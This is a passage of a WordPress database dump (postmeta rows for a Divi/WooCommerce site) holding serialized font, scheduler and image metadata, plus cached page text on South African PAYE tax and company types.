Order!'),(11444,136,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20189,33200,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566609689;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11445,96,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19671,33050,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566373394;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11446,122,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:5;s:10:\"devanagari\";}}'),(11447,132,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(19690,33069,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566412062;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(11448,112,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20216,33135,'wcf-pre-checkout-offer-discount',''),(11449,124,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:5;s:10:\"devanagari\";}}'),(11450,134,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:5;s:10:\"devanagari\";}}'),(11457,118,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:10:\"devanagari\";i:2;s:9:\"latin-ext\";}}'),(11458,491,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11459,52,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11460,27942,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11461,459,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(11462,28554,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11463,27858,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:12:\"et-gf-roboto\";s:91:\"Roboto:100,100italic,300,300italic,regular,italic,500,500italic,700,700italic,900,900italic\";}s:6:\"subset\";a:7:{i:0;s:5:\"latin\";i:1;s:8:\"cyrillic\";i:2;s:5:\"greek\";i:3;s:10:\"vietnamese\";i:4;s:9:\"greek-ext\";i:5;s:9:\"latin-ext\";i:6;s:12:\"cyrillic-ext\";}}'),(11464,28503,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11465,28702,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:4;s:10:\"devanagari\";}}'),(11466,28523,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11467,28066,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11468,287,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(11469,27865,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:1:{i:0;s:5:\"latin\";}}'),(11969,4,'_et_pb_ab_subjects',''),(11970,4,'_thumbnail_id',''),(11971,4,'_et_pb_show_page_creation','off'),(11972,29342,'_edit_lock','1544423916:3'),(11973,29342,'_edit_last','3'),(11974,29342,'_wp_page_template','default'),(11975,29342,'_et_pb_post_hide_nav','default'),(11976,29342,'_et_pb_page_layout','et_right_sidebar'),(11977,29342,'_et_pb_side_nav','off'),(11978,29342,'_et_pb_use_builder','on'),(11979,29342,'_et_builder_version','VB|Divi|3.17.6'),(11981,29342,'_et_pb_old_content',''),(11982,29342,'_et_pb_enable_shortcode_tracking',''),(11983,29342,'_et_pb_custom_css',''),(11984,29342,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:10:\"devanagari\";i:2;s:9:\"latin-ext\";}}'),(11986,29342,'_et_pb_built_for_post_type','page'),(11987,29342,'_et_pb_ab_subjects',''),(11988,29342,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"29342\" /]'),(11989,29342,'_thumbnail_id',''),(12048,29377,'_et_pb_row_layout','1_2,1_2'),(12049,29377,'_et_pb_built_for_post_type','page'),(12050,29378,'_et_pb_row_layout','4_4'),(12051,29378,'_et_pb_built_for_post_type','page'),(12052,29379,'_et_pb_built_for_post_type','page'),(12053,29380,'_et_pb_built_for_post_type','page'),(12054,29381,'_et_pb_row_layout','1_2,1_2'),(12055,29381,'_et_pb_built_for_post_type','page'),(12056,29382,'_et_pb_row_layout','1_3,1_3,1_3'),(12057,29382,'_et_pb_built_for_post_type','page'),(12058,29342,'_et_pb_show_page_creation','off'),(12059,29385,'_edit_last','3'),(12060,29385,'_wp_page_template','default'),(12061,29385,'_et_pb_post_hide_nav','default'),(12062,29385,'_et_pb_page_layout','et_right_sidebar'),(12063,29385,'_et_pb_side_nav','off'),(12064,29385,'_et_pb_use_builder','on'),(12065,29385,'_et_builder_version','VB|Divi|3.17.6'),(12067,29385,'_et_pb_old_content',''),(12068,29385,'_et_pb_enable_shortcode_tracking',''),(12069,29385,'_et_pb_custom_css',''),(12070,29385,'_edit_lock','1544432041:3'),(12072,29385,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:12:\"et-gf-roboto\";s:91:\"Roboto:100,100italic,300,300italic,regular,italic,500,500italic,700,700italic,900,900italic\";}s:6:\"subset\";a:8:{i:0;s:5:\"latin\";i:1;s:10:\"devanagari\";i:2;s:9:\"latin-ext\";i:3;s:8:\"cyrillic\";i:4;s:5:\"greek\";i:5;s:10:\"vietnamese\";i:6;s:9:\"greek-ext\";i:7;s:12:\"cyrillic-ext\";}}'),(12073,29385,'_et_pb_built_for_post_type','page'),(12074,29385,'_et_pb_ab_subjects',''),(12075,29385,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"29385\" /]'),(12076,29385,'_thumbnail_id',''),(12109,29385,'_et_pb_show_page_creation','off'),(12114,29421,'_edit_lock','1544520444:3'),(12115,29421,'_edit_last','3'),(12116,29421,'_wp_page_template','default'),(12117,29421,'_et_pb_post_hide_nav','default'),(12118,29421,'_et_pb_page_layout','et_right_sidebar'),(12119,29421,'_et_pb_side_nav','off'),(12120,29421,'_et_pb_use_builder','on'),(12121,29421,'_et_builder_version','VB|Divi|3.18.4'),(12123,29421,'_et_pb_old_content',''),(12124,29421,'_et_pb_enable_shortcode_tracking',''),(12125,29421,'_et_pb_custom_css',''),(12126,29421,'_et_pb_show_page_creation','off'),(12127,29421,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:15:\"et-gf-open-sans\";s:80:\"Open+Sans:300,300italic,regular,italic,600,600italic,700,700italic,800,800italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:8:{i:0;s:5:\"latin\";i:1;s:8:\"cyrillic\";i:2;s:5:\"greek\";i:3;s:10:\"vietnamese\";i:4;s:9:\"greek-ext\";i:5;s:9:\"latin-ext\";i:6;s:12:\"cyrillic-ext\";i:7;s:10:\"devanagari\";}}'),(12162,29443,'_et_pb_row_layout','1_5,1_5,1_5,1_5,1_5'),(12163,29443,'_et_pb_built_for_post_type','page'),(12164,29421,'_et_pb_built_for_post_type','page'),(12165,29421,'_et_pb_ab_subjects',''),(12166,29421,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"29421\" /]'),(12167,29421,'_thumbnail_id',''),(12168,29449,'_wp_attached_file','2018/12/advance1600.png'),(12169,29449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1600;s:4:\"file\";s:23:\"2018/12/advance1600.png\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"advance1600-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"advance1600-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"advance1600-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"advance1600-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"advance1600-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"advance1600-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:23:\"advance1600-610x610.png\";s:5:\"width\";i:610;s:6:\"height\";i:610;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:23:\"advance1600-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:24:\"advance1600-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:23:\"advance1600-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:23:\"advance1600-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:25:\"advance1600-1080x1080.png\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:23:\"advance1600-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"advance1600-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"advance1600-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"advance1600-510x510.png\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"advance1600-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12170,27847,'_et_pb_post_hide_nav','default'),(12171,27847,'_et_pb_page_layout','et_right_sidebar'),(12172,27847,'_et_pb_side_nav','off'),(12173,369,'_et_pb_truncate_post','<div class=\"et_pb_section et_pb_section_0 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0    et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_light  et_pb_text_align_left\">\n				\n				\n				<div class=\"et_pb_text_inner\">\n					<p>Employees’ Tax refers to the tax required to be deducted by an employer from an employee’s remuneration paid or payable. The process of deducting or withholding tax from remuneration as it is earned by an employee is commonly referred to as PAYE.</p>\n<p>An employer who is registered or required to register with SARS for PAYE and/or Skills Development Levy (SDL) purposes, is also required to register with SARS for the payment of Unemployment Insurance Fund (UIF) contributions to SARS.</p>\n<p>1 September 2015 &#8211; Employer Interim Reconciliation is open from 1 September to 30 October 2015 for the period 1 March to 31 August 2015<br />\n1 September 2015 &#8211; PAYE Reconciliation Communication: Clarification for August 2015 IRP5/IT3(a) Certificates</p>\n<p>The amounts deducted or withheld must be paid by the employer to SARS on a monthly basis, by completing the Monthly Employer Declaration (EMP201). The EMP201 is a payment declaration in which the employer declares the total payment together with the allocations for PAYE, SDL, UIF and/or Employment Tax Incentive (ETI), if applicable. A unique Payment Reference Number (PRN) will be pre-populated on the EMP201, and will be used to link the actual payment with the relevant EMP201 payment declaration</p>\n<p>How and when should it be paid? It must be paid within seven days after the end of the month during which the amount was deducted. If the last day for payment falls on a public holiday or weekend, the payment must be made on the last business day before the public holiday or weekend.</p>\n<p>The following payment methods are available:</p>\n<p> 	Electronic payments through the internet (EFT)<br />\n 	At a branch of one of the relevant approved banking institutions. Cheque payments may not exceed R50 000. This limit applies irrespective of the number of tax periods being paid, or should multiple cheque payments be made.<br />\n 	At a specific SARS branch, cheque payments may not exceed R50 000. This limit applies irrespective of the number of tax periods being paid, or should multiple cheque payments be made.</p>\n<p>Note:<br />\nEmployers who pay, or are likely to pay Employees’ Tax exceeding R10 million in any 12-month period, must submit Employees’ Tax declarations and make payments electronically.</p>\n				</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section -->\n<span class=\"et_bloom_bottom_trigger\"></span>'),(12174,309,'_et_pb_truncate_post','<div class=\"et_pb_section et_pb_section_1 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_1\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light  et_pb_text_align_left\">\n				\n				\n				<div class=\"et_pb_text_inner\">\n					<p>What are the types of companies that can be registered in terms of the New Companies Act 71, 2008?</p>\n<p> 	Private company (Pty) Ltd<br />\n 	Public company (Ltd)<br />\n 	State-owned company (SOC)<br />\n 	External company<br />\n 	Personal liability company (Inc)<br />\n 	Non-profit company (NPC)</p>\n<p> </p>\n<p>What is a private company?</p>\n<p>Private companies are comparable to companies of the same status under the Companies Act, 1973 and are characterised by the following:</p>\n<p> 	They are subject to fewer disclosure and transparency requirements.<br />\n 	A private company will still be prohibited from offering its shares to the public and the transferability of its shares will be restricted, but it may now have more than 50 shareholders.<br />\n 	The name of a private company must end with the expression “Proprietary Limited” or its abbreviation “(Pty) Ltd”.<br />\n 	The board of a private company must comprise at least one director, or any other minimum number as stipulated in its MOI. Each incorporator is a first director of the company.</p>\n<p>What is a public company?</p>\n<p>Public companies are comparable to companies of the same status under the Companies Act, 1973. They are characterised by the following:<br />\n• Their MOI permits them to offer shares to the public but restricts limits or negates their right of pre-emption.<br />\n• The name of a public company must end with the word “Limited” or its abbreviation, “Ltd”.<br />\n• A public company must have at least three directors.</p>\n<p>What is an external company?</p>\n<p>An external company is a foreign company that is carrying on business or non-profit activities within the Republic. It must register with the Companies and Intellectual Property Commission (CIPC) within 20 business days after it first begins to conduct activities within the Republic as an external non-profit company (NPC) or as an external company.</p>\n<p>What is a non-profit company?</p>\n<p>A non-Profit Company is a company that is incorporated for a public benefit . Its income and property are not distributable to its incorporators, members, directors, officers or persons related to any of them, except as reasonable compensation for service rendered. Three (3) persons and 3 directors may form an NPC.</p>\n<p> 	They are incorporated for a “public benefit purpose”.<br />\n 	Income and property may not be distributed to the incorporators, members, directors or officers of a non-profit company, except for reasonable compensation for services rendered by them.<br />\n 	The name of a non-profit company will end with “NPC”.<br />\n 	A minimum of three persons, called incorporators, must complete and sign the MOI.<br />\n 	A minimum of three directors must be appointed.<br />\n 	All of a non-profit company’s assets and income must be used to advance its stated objectives, as set out in its MOI.<br />\n 	Non-profit companies are subject to a varied application of the Act, as set out in section 10.</p>\n<p>A special set out fundamental rules for non-profit companies is set out in the Companies Act, 2008. According to these rules, the objects of non-profit companies remain subject to the current principles. Furthermore, on their dissolution, non-profit companies are restricted in terms of the distribution of any residual assets. These special rules also include various other matters unique to non-profit companies.</p>\n<p>What is a personal liability company?</p>\n<p>A personal liability company is comparable to companies contemplated in  the Companies Act, 1973. Its name must end with the word “Incorporated” it meets the criteria for a private company, and its MOI provides that the directors and past directors are jointly and severally liable, together with the company, for any debts and liabilities of the company that were contracted during their respective terms of office.</p>\n<p>What will it cost to register a company?</p>\n<p> 	Refer to Private Company Registration Owner Managed<br />\n 	Refer to Private Company Registration Multiple Shareholders involved in running the business<br />\n 	Refer to Private Company Registration Multiple Shareholders who are not directly involved in running the business<br />\n 	Refer to Personal Liability Company<br />\n 	Refer to Non-Profit Company</p>\n				</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section -->\n<span class=\"et_bloom_bottom_trigger\"></span>'),(12348,187,'_et_pb_show_page_creation','off'),(12349,187,'_et_pb_built_for_post_type','page'),(12350,187,'_et_pb_ab_subjects',''),(12351,187,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"187\" /]'),(12352,187,'_thumbnail_id',''),(12353,187,'_et_pb_first_image',''),(12354,187,'_et_pb_truncate_post',''),(12355,187,'_et_builder_version','VB|Divi|3.24'),(12997,29573,'_edit_lock','1559215952:3'),(12998,29573,'_edit_last','3'),(12999,29573,'_et_pb_post_hide_nav','default'),(13000,29573,'_et_pb_page_layout','et_right_sidebar'),(13001,29573,'_et_pb_side_nav','off'),(13002,29573,'_et_pb_use_builder','on'),(13003,29573,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:5:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:22:\"et-gf-playfair-display\";s:59:\"Playfair+Display:regular,italic,700,700italic,900,900italic\";s:12:\"et-gf-nunito\";s:105:\"Nunito:200,200italic,300,300italic,regular,italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";}s:6:\"subset\";a:5:{i:0;s:5:\"latin\";i:1;s:10:\"devanagari\";i:2;s:9:\"latin-ext\";i:3;s:8:\"cyrillic\";i:4;s:10:\"vietnamese\";}}'),(13014,29573,'_et_pb_built_for_post_type','page'),(13015,29573,'_et_pb_ab_subjects',''),(13016,29573,'_et_pb_enable_shortcode_tracking',''),(13017,29573,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"29573\" /]'),(13018,29573,'_et_pb_custom_css',''),(13019,29573,'_thumbnail_id',''),(13020,29573,'_et_pb_first_image',''),(13021,29573,'_et_pb_truncate_post',''),(13022,29573,'_et_builder_version','VB|Divi|3.23.3'),(13023,29573,'_et_pb_show_page_creation','off'),(13025,29583,'_edit_lock','1560494866:3'),(13026,29583,'_edit_last','3'),(17245,31377,'_wp_attachment_image_alt','Money Bank Guarantee'),(19603,32979,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566204156;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19601,32864,'_et_pb_show_page_creation','off'),(19602,32978,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566204156;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17248,31381,'_wp_attached_file','2019/07/satisfaction-guarantee-2109235_1280.png'),(17249,31381,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1113;s:6:\"height\";i:902;s:4:\"file\";s:47:\"2019/07/satisfaction-guarantee-2109235_1280.png\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-768x622.png\";s:5:\"width\";i:768;s:6:\"height\";i:622;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"satisfaction-guarantee-2109235_1280-1024x830.png\";s:5:\"width\";i:1024;s:6:\"height\";i:830;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-610x494.png\";s:5:\"width\";i:610;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:48:\"satisfaction-guarantee-2109235_1280-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:48:\"satisfaction-guarantee-2109235_1280-1080x875.png\";s:5:\"width\";i:1080;s:6:\"height\";i:875;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:47:\"satisfaction-guarantee-2109235_1280-510x413.png\";s:5:\"width\";i:510;s:6:\"height\";i:413;s:9:\"mime-type\";s:9:\"image/png\";}s:2